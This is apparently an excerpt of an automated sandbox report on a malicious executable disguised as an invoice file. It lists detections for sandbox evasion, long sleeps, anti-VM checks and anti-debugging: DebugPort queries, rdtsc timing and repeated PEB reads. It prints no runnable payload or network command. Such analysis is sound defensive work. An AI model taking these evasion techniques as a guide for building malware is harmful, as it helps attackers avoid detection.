Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: HYCO_Invoices MS2 & MS3.exe PID: 1020, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Memory allocated: 1900000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Memory allocated: 32F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Memory allocated: 52F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Memory allocated: 66E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Memory allocated: 76E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Memory allocated: 7920000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Memory allocated: 8920000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0103096E rdtsc 2_2_0103096E
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\replace.exe Window / User API: threadDelayed 9782 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe API coverage: 0.8 %
Source: C:\Windows\SysWOW64\replace.exe API coverage: 3.0 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe TID: 6096 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe TID: 6524 Thread sleep count: 191 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe TID: 6524 Thread sleep time: -382000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe TID: 6524 Thread sleep count: 9782 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe TID: 6524 Thread sleep time: -19564000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\replace.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\replace.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E1BC00 FindFirstFileW,FindNextFileW,FindClose, 5_2_00E1BC00
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890083176.000000000055F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: replace.exe, 00000005.00000002.2889773857.0000000003080000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2210324690.000001DAA7C3B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0103096E rdtsc 2_2_0103096E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00417673 LdrLoadDll, 2_2_00417673
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FEC0F0 mov eax, dword ptr fs:[00000030h] 2_2_00FEC0F0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0109A118 mov ecx, dword ptr fs:[00000030h] 2_2_0109A118
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0109A118 mov eax, dword ptr fs:[00000030h] 2_2_0109A118
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0109A118 mov eax, dword ptr fs:[00000030h] 2_2_0109A118
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0109A118 mov eax, dword ptr fs:[00000030h] 2_2_0109A118
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF80E9 mov eax, dword ptr fs:[00000030h] 2_2_00FF80E9
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FEA0E3 mov ecx, dword ptr fs:[00000030h] 2_2_00FEA0E3
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010B0115 mov eax, dword ptr fs:[00000030h] 2_2_010B0115
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01020124 mov eax, dword ptr fs:[00000030h] 2_2_01020124
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01084144 mov eax, dword ptr fs:[00000030h] 2_2_01084144
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01084144 mov eax, dword ptr fs:[00000030h] 2_2_01084144
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01084144 mov ecx, dword ptr fs:[00000030h] 2_2_01084144
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01084144 mov eax, dword ptr fs:[00000030h] 2_2_01084144
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01084144 mov eax, dword ptr fs:[00000030h] 2_2_01084144
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01088158 mov eax, dword ptr fs:[00000030h] 2_2_01088158
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF208A mov eax, dword ptr fs:[00000030h] 2_2_00FF208A
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010AC188 mov eax, dword ptr fs:[00000030h] 2_2_010AC188
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010AC188 mov eax, dword ptr fs:[00000030h] 2_2_010AC188
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01030185 mov eax, dword ptr fs:[00000030h] 2_2_01030185
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01094180 mov eax, dword ptr fs:[00000030h] 2_2_01094180
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01094180 mov eax, dword ptr fs:[00000030h] 2_2_01094180
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0107019F mov eax, dword ptr fs:[00000030h] 2_2_0107019F
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0107019F mov eax, dword ptr fs:[00000030h] 2_2_0107019F
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0107019F mov eax, dword ptr fs:[00000030h] 2_2_0107019F
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0107019F mov eax, dword ptr fs:[00000030h] 2_2_0107019F
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF2050 mov eax, dword ptr fs:[00000030h] 2_2_00FF2050
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010B61C3 mov eax, dword ptr fs:[00000030h] 2_2_010B61C3
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010B61C3 mov eax, dword ptr fs:[00000030h] 2_2_010B61C3
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0106E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0106E1D0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0106E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0106E1D0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0106E1D0 mov ecx, dword ptr fs:[00000030h] 2_2_0106E1D0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0106E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0106E1D0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0106E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0106E1D0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FEA020 mov eax, dword ptr fs:[00000030h] 2_2_00FEA020
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FEC020 mov eax, dword ptr fs:[00000030h] 2_2_00FEC020
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010C61E5 mov eax, dword ptr fs:[00000030h] 2_2_010C61E5
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010201F8 mov eax, dword ptr fs:[00000030h] 2_2_010201F8
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01074000 mov ecx, dword ptr fs:[00000030h] 2_2_01074000
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01092000 mov eax, dword ptr fs:[00000030h] 2_2_01092000
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01092000 mov eax, dword ptr fs:[00000030h] 2_2_01092000
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01092000 mov eax, dword ptr fs:[00000030h] 2_2_01092000
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01092000 mov eax, dword ptr fs:[00000030h] 2_2_01092000
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01092000 mov eax, dword ptr fs:[00000030h] 2_2_01092000
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01092000 mov eax, dword ptr fs:[00000030h] 2_2_01092000
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01092000 mov eax, dword ptr fs:[00000030h] 2_2_01092000
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01092000 mov eax, dword ptr fs:[00000030h] 2_2_01092000
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0100E016 mov eax, dword ptr fs:[00000030h] 2_2_0100E016
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0100E016 mov eax, dword ptr fs:[00000030h] 2_2_0100E016
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0100E016 mov eax, dword ptr fs:[00000030h] 2_2_0100E016
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0100E016 mov eax, dword ptr fs:[00000030h] 2_2_0100E016
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01086030 mov eax, dword ptr fs:[00000030h] 2_2_01086030
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01076050 mov eax, dword ptr fs:[00000030h] 2_2_01076050
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FEA197 mov eax, dword ptr fs:[00000030h] 2_2_00FEA197
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FEA197 mov eax, dword ptr fs:[00000030h] 2_2_00FEA197
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FEA197 mov eax, dword ptr fs:[00000030h] 2_2_00FEA197
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0101C073 mov eax, dword ptr fs:[00000030h] 2_2_0101C073
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010880A8 mov eax, dword ptr fs:[00000030h] 2_2_010880A8
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FEC156 mov eax, dword ptr fs:[00000030h] 2_2_00FEC156
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF6154 mov eax, dword ptr fs:[00000030h] 2_2_00FF6154
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF6154 mov eax, dword ptr fs:[00000030h] 2_2_00FF6154
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010B60B8 mov eax, dword ptr fs:[00000030h] 2_2_010B60B8
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010B60B8 mov ecx, dword ptr fs:[00000030h] 2_2_010B60B8
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010720DE mov eax, dword ptr fs:[00000030h] 2_2_010720DE
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010760E0 mov eax, dword ptr fs:[00000030h] 2_2_010760E0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010320F0 mov ecx, dword ptr fs:[00000030h] 2_2_010320F0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0102A30B mov eax, dword ptr fs:[00000030h] 2_2_0102A30B
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0102A30B mov eax, dword ptr fs:[00000030h] 2_2_0102A30B
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0102A30B mov eax, dword ptr fs:[00000030h] 2_2_0102A30B
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01010310 mov ecx, dword ptr fs:[00000030h] 2_2_01010310
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFA2C3 mov eax, dword ptr fs:[00000030h] 2_2_00FFA2C3
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFA2C3 mov eax, dword ptr fs:[00000030h] 2_2_00FFA2C3
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFA2C3 mov eax, dword ptr fs:[00000030h] 2_2_00FFA2C3
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFA2C3 mov eax, dword ptr fs:[00000030h] 2_2_00FFA2C3
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFA2C3 mov eax, dword ptr fs:[00000030h] 2_2_00FFA2C3
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01072349 mov eax, dword ptr fs:[00000030h] 2_2_01072349
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01072349 mov eax, dword ptr fs:[00000030h] 2_2_01072349
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01072349 mov eax, dword ptr fs:[00000030h] 2_2_01072349
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01072349 mov eax, dword ptr fs:[00000030h] 2_2_01072349
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01072349 mov eax, dword ptr fs:[00000030h] 2_2_01072349
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01072349 mov eax, dword ptr fs:[00000030h] 2_2_01072349
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01072349 mov eax, dword ptr fs:[00000030h] 2_2_01072349
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01072349 mov eax, dword ptr fs:[00000030h] 2_2_01072349
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01072349 mov eax, dword ptr fs:[00000030h] 2_2_01072349
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01072349 mov eax, dword ptr fs:[00000030h] 2_2_01072349
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01072349 mov eax, dword ptr fs:[00000030h] 2_2_01072349
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01072349 mov eax, dword ptr fs:[00000030h] 2_2_01072349
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01072349 mov eax, dword ptr fs:[00000030h] 2_2_01072349
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01072349 mov eax, dword ptr fs:[00000030h] 2_2_01072349
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01072349 mov eax, dword ptr fs:[00000030h] 2_2_01072349
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010BA352 mov eax, dword ptr fs:[00000030h] 2_2_010BA352
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01098350 mov ecx, dword ptr fs:[00000030h] 2_2_01098350
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0107035C mov eax, dword ptr fs:[00000030h] 2_2_0107035C
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0107035C mov eax, dword ptr fs:[00000030h] 2_2_0107035C
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0107035C mov eax, dword ptr fs:[00000030h] 2_2_0107035C
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0107035C mov ecx, dword ptr fs:[00000030h] 2_2_0107035C
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0107035C mov eax, dword ptr fs:[00000030h] 2_2_0107035C
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0107035C mov eax, dword ptr fs:[00000030h] 2_2_0107035C
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0109437C mov eax, dword ptr fs:[00000030h] 2_2_0109437C
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0101438F mov eax, dword ptr fs:[00000030h] 2_2_0101438F
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0101438F mov eax, dword ptr fs:[00000030h] 2_2_0101438F
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FE826B mov eax, dword ptr fs:[00000030h] 2_2_00FE826B
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF4260 mov eax, dword ptr fs:[00000030h] 2_2_00FF4260
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF4260 mov eax, dword ptr fs:[00000030h] 2_2_00FF4260
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF4260 mov eax, dword ptr fs:[00000030h] 2_2_00FF4260
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF6259 mov eax, dword ptr fs:[00000030h] 2_2_00FF6259
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FEA250 mov eax, dword ptr fs:[00000030h] 2_2_00FEA250
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FE823B mov eax, dword ptr fs:[00000030h] 2_2_00FE823B
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010AC3CD mov eax, dword ptr fs:[00000030h] 2_2_010AC3CD
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010763C0 mov eax, dword ptr fs:[00000030h] 2_2_010763C0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010943D4 mov eax, dword ptr fs:[00000030h] 2_2_010943D4
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010943D4 mov eax, dword ptr fs:[00000030h] 2_2_010943D4
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010003E9 mov eax, dword ptr fs:[00000030h] 2_2_010003E9
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010003E9 mov eax, dword ptr fs:[00000030h] 2_2_010003E9
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010003E9 mov eax, dword ptr fs:[00000030h] 2_2_010003E9
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010003E9 mov eax, dword ptr fs:[00000030h] 2_2_010003E9
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010003E9 mov eax, dword ptr fs:[00000030h] 2_2_010003E9
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010003E9 mov eax, dword ptr fs:[00000030h] 2_2_010003E9
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010003E9 mov eax, dword ptr fs:[00000030h] 2_2_010003E9
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010003E9 mov eax, dword ptr fs:[00000030h] 2_2_010003E9
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0100E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0100E3F0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0100E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0100E3F0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0100E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0100E3F0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010263FF mov eax, dword ptr fs:[00000030h] 2_2_010263FF
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF83C0 mov eax, dword ptr fs:[00000030h] 2_2_00FF83C0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF83C0 mov eax, dword ptr fs:[00000030h] 2_2_00FF83C0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF83C0 mov eax, dword ptr fs:[00000030h] 2_2_00FF83C0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF83C0 mov eax, dword ptr fs:[00000030h] 2_2_00FF83C0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFA3C0 mov eax, dword ptr fs:[00000030h] 2_2_00FFA3C0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFA3C0 mov eax, dword ptr fs:[00000030h] 2_2_00FFA3C0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFA3C0 mov eax, dword ptr fs:[00000030h] 2_2_00FFA3C0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFA3C0 mov eax, dword ptr fs:[00000030h] 2_2_00FFA3C0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFA3C0 mov eax, dword ptr fs:[00000030h] 2_2_00FFA3C0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFA3C0 mov eax, dword ptr fs:[00000030h] 2_2_00FFA3C0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01078243 mov eax, dword ptr fs:[00000030h] 2_2_01078243
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01078243 mov ecx, dword ptr fs:[00000030h] 2_2_01078243
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FE8397 mov eax, dword ptr fs:[00000030h] 2_2_00FE8397
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FE8397 mov eax, dword ptr fs:[00000030h] 2_2_00FE8397
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FE8397 mov eax, dword ptr fs:[00000030h] 2_2_00FE8397
